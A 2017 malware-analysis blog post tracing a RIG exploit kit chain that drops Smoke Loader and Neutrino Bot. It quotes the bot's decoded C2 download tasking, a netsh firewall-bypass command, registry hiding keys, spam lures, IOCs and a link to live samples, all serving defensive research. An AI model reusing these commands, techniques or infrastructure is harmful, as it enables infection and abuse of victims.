# Shadow Server Domains Leading to RIG Exploit Kit Dropping Smoke Loader. Downloaded Neutrino Bot (AKA Kasidet). **malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-** downloads-neutrino-bot-aka-kasidet/ April 3, 2017 ### Brief History [These infection chains began from IOCs collected by Zain Gardezi over at FireEye. You can](https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/zain-gardezi) read the report [HERE. The report contained a lot of IOCs, but the one that I want to](https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html) highlight is the IP address 173.208.245.114. I was interested in this IP because the host using it was acting as a shadow server, hosting numerous domains that were redirecting victims to Sundown EK. Some of the most recent domains resolving to that IP address include maddow.club and sayvinatge.club. Using those two domains as my referers proved to be successful as my host was redirected to RIG exploit kit numerous times. I don’t have time to go over each infection chain, but they are all similar. So, one example should do just fine. ### Infection Chain The infection chain I’m using as my example is from the Third Run. The infection begins when I visited sayvinatge.club. Below is the GET request for the domain and the web servers response: ----- The server responds with a 302 Found and gives the new location of freeonlinecoupons.ml/go.php. My host then makes a GET request for the go.php hosted at freeonlinecoupons.ml: Again, we see a web server respond with another “302 Found” with the new location being that of a RIG exploit kit landing page at temp.askthevendor.com: The browser loads the landing page and it is visible to the user (it usually happens out of the users view): ----- Below is an image of the traffic from the Third Run: We then see the Flash exploit being sent to the host which is eventually followed by the [malware payload: ask33u6p.exe (Smoke Loader). The script responsible for downloading the](https://www.virustotal.com/en/file/3a6e2251e64e387adcc887dfeea52200a96f529c18f94b2e32caff43557c6381/analysis/) payload is o32.tmp, which is dropped and executed in %TEMP%. Later on in the infection we see Smoke Loader generate GET requests for additional malware: [s927397.exe (aka 1D95.tmp.exe) which appears to be an updated version of](https://www.virustotal.com/en/file/1b6a98a7ba4e5fac878f2f8f284fa748c889fa4e4a9a0905748144fffd890f4b/analysis/) [Smoke Loader and smoke927397.exe (aka 4CC4.tmp.exe) which turns out to be Neutrino](https://www.virustotal.com/en/file/2c452bc79da741639bdb4229168d5bd541069e342eae63d1b96a3690fb10b48a/analysis/) [Bot. There is an excellent article written by Hasherezade and](https://twitter.com/hasherezade) [Jérôme Segura about Neutrino](https://blog.malwarebytes.com/author/jeromesegura) [Bot on the MalwareBytes Lab blog which you can read HERE.](https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/) Here is an image of my %TEMP% folder after many hours of letting my computer site idle: ----- If Neutrino bot detects that it is in a VM it deletes itself. It it passes checks then it copies itself to %APPDATA%: The folder alFSVWJB is hidden from the my view ----- However, the folder and the malware are hidden from my view. That being said, I can see from the running processes (gjhax_16.exe) and the location of the file that the malware copied itself to %APPDATA% in a folder called alFSVWJB (C:Users[Username]AppDataRoamingalFSVWJBgjhax_16.exe): You can also verify that the malware copied itself to %APPDATA% by looking at HKCU Run and HKLM Run: ----- The malware remains hidden by modifying the following registry keys: ``` HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden ``` Here are more entries as well as a base64 encoded value containing C2 information: ----- You’ll notice that the value in “a” (HKCUSoftwarealFSVWJB) contains the base64 encoded string “aHR0cDovL251dHN5c3RlbTEuYml0L25ld2ZpejIxL2xvZ291dC5waHA=”. This string decodes to “hxxp://nutsystem1.bit/newfiz21/logout.php”. The malware also added itself into the firewall’s whitelist via the command: ``` cmd.exe " /a /c netsh advfirewall firewall add rule name="alFSVWJB" dir=in action=allow program=%APPDATA%alFSVWJBgjhax_16.exe" ``` An example of this can be seen in the process tree below: Processes showing command Following these events we see the Neutrino bot beacon out the word “enter” to nutsystem1.bit/newfiz21/logout.php and the response from the server is “success” (“enter” and “success” are base64 encoded) ----- ZW50ZXI = enter and c3VjY2Vzcw = success Following the response we see another POST request to nutsystem1.bit/newfiz21/logout.php: The malware collects information about the host via some base64 encoded data: ``` cmd&10bbd51x-660x-467x-9dax-04c078c4210x&WIN-U2ULJPT1QBB&Windows%207%20(64bit)&1&N%2FA&5.2&01.04.2017&12042016ao ``` More base64 encoded data is in the response: ----- The base64 encoded data in the response decodes to: ``` 1489603355568117#rate 2#1469100096882000#botkiller#1491107194447607#LOADER hxxp://178.159.36.43/s927400.exe#1491108002685833#LOADER hxxp://178.159.36.43/156a927400.exe#1491108010686425#LOADER hxxp://178.159.36.43/156b927400.exe#1491108018671854#LOADER hxxp://178.159.36.43/17927400.exe#1491108026318949#LOADER hxxp://178.159.36.43/74927400.exe#1491108034649083#LOADER hxxp://178.159.36.43/121927400.exe#1491108056268670#LOADER hxxp://178.159.36.43/123927400.exe#1491108064704461#LOADER hxxp://178.159.36.43/85927400.exe#1491108072487207#LOADER hxxp://178.159.36.43/226927400.exe#1491108081559782#LOADER hxxp://178.159.36.43/38927400.exe#1491108090903250#LOADER hxxp://178.159.36.43/161927400.exe# ``` This prompts my host to download additional malware from 178.159.36.43: ----- Host downloads additional files from locations retrieved by the C2 This is the part that threw me for a bit of a loop. You’ll notice a lot of POST requests to Omegle.com and its various subdomains. I had no idea what Omegle.com was but apparently it’s a website that allows users to connect to various servers and talk to random strangers. Looking at the POST requests we can see the following pattern: 1. front3.omegle.com/start?rcs=1&firstevents=1&spid=&randid=UMKDFYRE&lang=en 2. front3.omegle.com/events 3. front3.omegle.com/send 4. front3.omegle.com/disconnect It repeats this pattern over and over again, each time switching between subdomains “front1.omegle.com” through “front15.omegle.com.” What is it doing exactly? Well, it is connecting to the servers via /start? rcs=1&firstevents=1&spid=&randid=UMKDFYRE&lang=en and then sends messages to the strangers using POST /send. Once it is done spamming the message it disconnects from the server via POST /disconnect and moves to the next one. ----- The message being spammed on Omegle.com servers is as follows: ``` hi wassup? girl here with picturesz i'm soo bored. just kik me at: [random kik username] this is my kik user-name, im gunna wait for ya ;) ``` And here is the message shown on Omegle.com: Here is a TCP stream showing the messages being sent to Omegle.com: msg = hey ----- msg = friendly girl here. i love dogs 😉 msg = want to be my friend on kik? msg = LynrDowdle ----- msg = here is my kik User,Name. im going to be on right now 😉 I’m also seeing traffic to Instagram: ----- ----- Maybe the bot is simply trying to drive traffic to paying customers? If anyone knows for sure you can contact me via Twitter. All the files should be available for download via the HybridAnalysis reports in the IOCs section. ### IOCs First Run 173.208.245.114 – maddow.club – Shadow server domain 23.238.19.56 – freecouponcodes.ml – GET /gile.php – Gate 185.159.128.195 – admin.pennypincherconsignment.com – RIG exploit kit Second Run 173.208.245.114 – maddow.club – Shadow server domain 23.238.19.56 – freecouponcodes.ml – GET /gile.php – Gate 185.159.128.195 – free.jimmagescontract.com – RIG exploit kit 178.159.36.151 – GET /s927392.exe – ET INFO Executable Download from dottedquad Host 178.159.36.151 – GET /smoke927392.exe – ET INFO Executable Download from dotted-quad Host 23.5.104.242 – java.com – ET TROJAN Sharik/Smoke Loader Java Connectivity Check ----- 192.150.16.117 – adobe.de – POST /support/main.html – ET TROJAN Sharik/Smoke Loader Adobe Connectivity check 112.78.9.34 – mailserv.xsayeszhaifa.bit – POST /hosting2/ 112.78.9.137 – smoke.nutsystem3210z.bit – POST /hosting/ Third Run 173.208.245.114 – sayvinatge.club – Shadow server domain 23.238.19.56 – freeonlinecoupons.ml – GET /go.php – Gate 188.225.34.15 – temp.askthevendor.com – RIG exploit kit 178.159.36.162 – GET /s927397.exe 178.159.36.162 – GET /smoke927397.exe Fourth Run 173.208.245.114 – sayvinatge.club – Shadow server domain 23.238.19.56 – freeonlinecoupons.ml – GET /go.php – Gate 188.225.34.15 – art.auctionagenda.com – RIG exploit kit C&C Traffic 112.78.9.34 – nutsystem1.bit – POST /newfiz21/logout.php 112.78.9.31 – nutsystem1.bit – POST /newfiz21/logout.php 178.159.36.43 – GET /s927400.exe 178.159.36.43 – GET /156a927400.exe 178.159.36.43 – GET /156b927400.exe 178.159.36.43 – GET /17927400.exe 178.159.36.43 – GET /74927400.exe 178.159.36.43 – GET /121927400.exe 178.159.36.43 – GET /123927400.exe 178.159.36.43 – GET /85927400.exe 178.159.36.43 – GET /226927400.exe 178.159.36.43 – GET /38927400.exe 178.159.36.43 – GET /161927400.exe: More Post-Infection Traffic 186.190.212.26 – GET /ip.php – External IP lookup 91.203.4.28 – myip.com.ua – External IP lookup 136.243.154.209 – File contains “Домен не опознан” (Domain not recognized) 142.54.173.10 – GET /prx.php?test_sock_porx=1 – Server returns 200 OK, Content “OK” 85.25.74.92 – GET /prx.php?test_sock_porx=1 – Server returns 200 OK, Content “OK” 217.23.10.156 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response ----- 89.248.174.17 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 80.82.65.74 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 109.236.87.85 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 91.232.105.121 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 217.23.14.123 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 93.190.137.226 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response 217.23.15.38 – TCP port 6600 209.86.93.227 – TCP port 25 – Simple Mail Transfer Protocol 98.138.112.38 – TCP port 25 – Simple Mail Transfer Protocol 98.138.112.37 – TCP port 25 – Simple Mail Transfer Protocol 66.196.118.36 – TCP port 25 – Simple Mail Transfer Protocol 93.190.139.161 – TCP port 7700 157.56.198.220 – mail.live.com – GET /md/default.aspx Spam Bot Post-Infection Traffic 104.23.128.76 – www[.]omegle.com 107.6.108.4 – front1.omegle.com 107.6.108.5 – front2.omegle.com 107.6.108.6 – front3.omegle.com 107.6.108.7 – front4.omegle.com 107.6.108.13 – front5.omegle.com 107.6.108.14 – front6.omegle.com 107.6.110.74 – front7.omegle.com 107.6.110.220 – front8.omegle.com 107.6.108.12 – front10.omegle.com 74.217.30.183 – front11.omegle.com 74.217.30.183 – front12.omegle.com 74.217.30.185 – front13.omegle.com 74.217.30.186 – front14.omegle.com 74.217.30.187 – front15.omegle.com 52.5.25.165 – instagram.com GET /p/BSWvOOPjrWV Post-Infection DNS Queries nutsystem1.bit ns.dotbit.me (107.161.16.236) alors deepdns cryptostorm net ----- onyx.deepdns.cryptostorm.net ns1.any.dns.d0wn.biz (198.251.86.12) ns1.random.dns.d0wn.biz (178.17.170.133) ns2.random.dns.d0wn.biz (185.14.29.140) anyone.dnsrec.meo.ws (185.121.177.177) ist.fellig.org (178.63.145.230) civet.ziphaze.com (138.68.128.160) ns2.fr.dns.d0wn.biz (37.187.0.40) ns1.sg.dns.d0wn.biz (128.199.248.105) ns1.nl.dns.d0wn.biz (95.85.9.86) ns1.domaincoin.net (83.96.168.183) ns2.domaincoin.net (108.61.40.140) nutsystem2.bit nutsystem3.bit propertiesofseyshellseden.com assetsofseyshellseden.com Hashes [SHA256: 09614207fbba5f83037a5c9da2248dcae06efff984d1db45effa04139d035b07](https://www.virustotal.com/en/file/09614207fbba5f83037a5c9da2248dcae06efff984d1db45effa04139d035b07/analysis/1491209375/) File name: RIG EK Flash Exploit 1.swf [SHA256: 15d2a4be2a53ca33a599a9d562cfec4e0b5c2102e03c3a7f3ea7d8a4a132b44f](https://www.virustotal.com/en/file/15d2a4be2a53ca33a599a9d562cfec4e0b5c2102e03c3a7f3ea7d8a4a132b44f/analysis/1491209475/) File name: RIG EK Flash Exploit 3.swf [SHA256: 1b9bf35a6662775e538f01738c1f6c94a35481192b63d2229030526d8c3f39f9](https://www.virustotal.com/en/file/1b9bf35a6662775e538f01738c1f6c94a35481192b63d2229030526d8c3f39f9/analysis/1491209576/) File name: RIG EK Flash Exploit 4.swf [SHA256: b7e2ac891a8e524668261b149515ccb0105655f1bcb5c8ad72a3fb78de2d02d3](https://www.virustotal.com/en/file/b7e2ac891a8e524668261b149515ccb0105655f1bcb5c8ad72a3fb78de2d02d3/analysis/) File name: o32.tmp [SHA256: 3a6e2251e64e387adcc887dfeea52200a96f529c18f94b2e32caff43557c6381](https://www.virustotal.com/en/file/3a6e2251e64e387adcc887dfeea52200a96f529c18f94b2e32caff43557c6381/analysis/) File name: ask33u6p.exe ID: Smoke Loader [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/3a6e2251e64e387adcc887dfeea52200a96f529c18f94b2e32caff43557c6381?environmentId=100) ----- [SHA256: f2a7198e2d18ea5a99d5ad1a707d7ffde7179c625eefaf88d6e7066bbc078d57](https://www.virustotal.com/en/file/f2a7198e2d18ea5a99d5ad1a707d7ffde7179c625eefaf88d6e7066bbc078d57/analysis/) File name: iwcahsmt.exe ID: Smoke Loader Traffic: www[.]adobe.de, smoke.nutsystem3210z.bit, mailserv.xsayeszhaifa.bit [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/f2a7198e2d18ea5a99d5ad1a707d7ffde7179c625eefaf88d6e7066bbc078d57?environmentId=100) [SHA256: 2c452bc79da741639bdb4229168d5bd541069e342eae63d1b96a3690fb10b48a](https://www.virustotal.com/en/file/2c452bc79da741639bdb4229168d5bd541069e342eae63d1b96a3690fb10b48a/analysis/) File name: smoke927397.exe ID: [#Neutrino Bot](https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/) Traffic: 112.78.9.34 – POST /newfiz21/logout.php [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/2c452bc79da741639bdb4229168d5bd541069e342eae63d1b96a3690fb10b48a?environmentId=100) ----- [SHA256: 1b6a98a7ba4e5fac878f2f8f284fa748c889fa4e4a9a0905748144fffd890f4b](https://www.virustotal.com/en/file/1b6a98a7ba4e5fac878f2f8f284fa748c889fa4e4a9a0905748144fffd890f4b/analysis/) File name: s927397.exe ID: #Smoke Loader [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/1b6a98a7ba4e5fac878f2f8f284fa748c889fa4e4a9a0905748144fffd890f4b?environmentId=100) [SHA256: 2d6c7a9a79ae01104ab02d53863ef69d184e26a1be27cfe6181fda9801d0aa3a](https://www.virustotal.com/en/file/2d6c7a9a79ae01104ab02d53863ef69d184e26a1be27cfe6181fda9801d0aa3a/analysis/) File name: 156a927400.exe Traffic: 217.23.10.156 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/2d6c7a9a79ae01104ab02d53863ef69d184e26a1be27cfe6181fda9801d0aa3a?environmentId=100) [SHA256: cadcb29d14804f8158569c187b37c624e6e8e2741e30a08dd69d3aedc2b967b5](https://www.virustotal.com/en/file/cadcb29d14804f8158569c187b37c624e6e8e2741e30a08dd69d3aedc2b967b5/analysis/) File name: 156b927400.exe ID: #Spambot Traffic: 217.23.10.156 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/cadcb29d14804f8158569c187b37c624e6e8e2741e30a08dd69d3aedc2b967b5?environmentId=100) [SHA256: 9ca331535f2e13641f21983925b37af6563666b58fc930dd00f6b25ab5ca238b](https://www.virustotal.com/en/file/9ca331535f2e13641f21983925b37af6563666b58fc930dd00f6b25ab5ca238b/analysis/) File name: 17927400.exe Traffic: 89.248.174.17 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid Analysis Report](https://www.hybrid-analysis.com/sample/9ca331535f2e13641f21983925b37af6563666b58fc930dd00f6b25ab5ca238b?environmentId=100) [SHA256: 89019d528960d3df0475cb828fdd4b3fa719a52792c2b27560a609f1b79f9a04](https://www.virustotal.com/en/file/89019d528960d3df0475cb828fdd4b3fa719a52792c2b27560a609f1b79f9a04/analysis/) File name: 38927400.exe Traffic: 217.23.15.38 – TCP port 6600 [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/89019d528960d3df0475cb828fdd4b3fa719a52792c2b27560a609f1b79f9a04?environmentId=100) [SHA256: 0d5351036f25df4720ad3569e1dbfe348a021133ba45d830fe2929990c15ccbc](https://www.virustotal.com/en/file/0d5351036f25df4720ad3569e1dbfe348a021133ba45d830fe2929990c15ccbc/analysis/) File name: 74927400.exe Traffic: 80.82.65.74 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/0d5351036f25df4720ad3569e1dbfe348a021133ba45d830fe2929990c15ccbc?environmentId=100) [SHA256: 1f0780558f660c48349e0457066c46fc6641ce94c692539fe1156d5419954b2b](https://www.virustotal.com/en/file/1f0780558f660c48349e0457066c46fc6641ce94c692539fe1156d5419954b2b/analysis/) File name: 85927400.exe Traffic: 109.236.87.85 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect ----- Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/1f0780558f660c48349e0457066c46fc6641ce94c692539fe1156d5419954b2b?environmentId=100) [SHA256: 1fb5f636aa1d3c06d15cfa7bbb30b686b879cef0306d5326a4bb10d1e2b5e1b2](https://www.virustotal.com/en/file/1fb5f636aa1d3c06d15cfa7bbb30b686b879cef0306d5326a4bb10d1e2b5e1b2/analysis/) File name: 121927400.exe Traffic: 91.232.105.121 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/1fb5f636aa1d3c06d15cfa7bbb30b686b879cef0306d5326a4bb10d1e2b5e1b2?environmentId=100) [SHA256: 96d8c85c21b7ae70eaff6385f3d2f6a3ec92276a137585964beb3098a59f8252](https://www.virustotal.com/en/file/96d8c85c21b7ae70eaff6385f3d2f6a3ec92276a137585964beb3098a59f8252/analysis/) File name: 123927400.exe Traffic: 217.23.14.123 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/96d8c85c21b7ae70eaff6385f3d2f6a3ec92276a137585964beb3098a59f8252?environmentId=100) [SHA256: f957ab49e2b8ae2b02aa829828c3dc1c6ffcb1f14355161a932f3c46d03dd3d7](https://www.virustotal.com/en/file/f957ab49e2b8ae2b02aa829828c3dc1c6ffcb1f14355161a932f3c46d03dd3d7/analysis/) File name: 226927400.exe Traffic: 93.190.137.226 – TCP port 5500 – ET TROJAN Lethic Spambot CnC Initial Connect Bot Response [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/f957ab49e2b8ae2b02aa829828c3dc1c6ffcb1f14355161a932f3c46d03dd3d7?environmentId=100) [SHA256: 9d845fbc4ee48395aad61ddf1e8e96f00e210c240cb6448db3b0cd098d5053b3](https://www.virustotal.com/en/file/9d845fbc4ee48395aad61ddf1e8e96f00e210c240cb6448db3b0cd098d5053b3/analysis/) File name: NNC254.tmp.exe and s927400.exe [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/9d845fbc4ee48395aad61ddf1e8e96f00e210c240cb6448db3b0cd098d5053b3?environmentId=100) [SHA256: ed83c7c98a7a3c802d3995d8036b08184bfe5576548d4eb6967f101615608a1f](https://www.virustotal.com/en/file/ed83c7c98a7a3c802d3995d8036b08184bfe5576548d4eb6967f101615608a1f/analysis/) File name: NN37AB.tmp.exe and s927398.exe [SHA256: 3bd9a181b15615b9f52a2061a9ca5f9d690de119ea84783a6904f120a4c685ea](https://www.virustotal.com/en/file/3bd9a181b15615b9f52a2061a9ca5f9d690de119ea84783a6904f120a4c685ea/analysis/) File name: NN46D9.tmp.exe and 161927400.exe Traffic: 93.190.139.161 – TCP 7700 [Hybrid-Analysis Report](https://www.hybrid-analysis.com/sample/3bd9a181b15615b9f52a2061a9ca5f9d690de119ea84783a6904f120a4c685ea?environmentId=100) ### Malicious Artifacts (Password is infected) [Malicious Artifacts.zip](https://malwarebreakdown.com/wp-content/uploads/2017/04/malicious-artifacts2.zip) Until next time! ## Published by malwarebreakdown ----- Just a normal person who spends their free time infecting systems with malware. View all posts by malwarebreakdown -----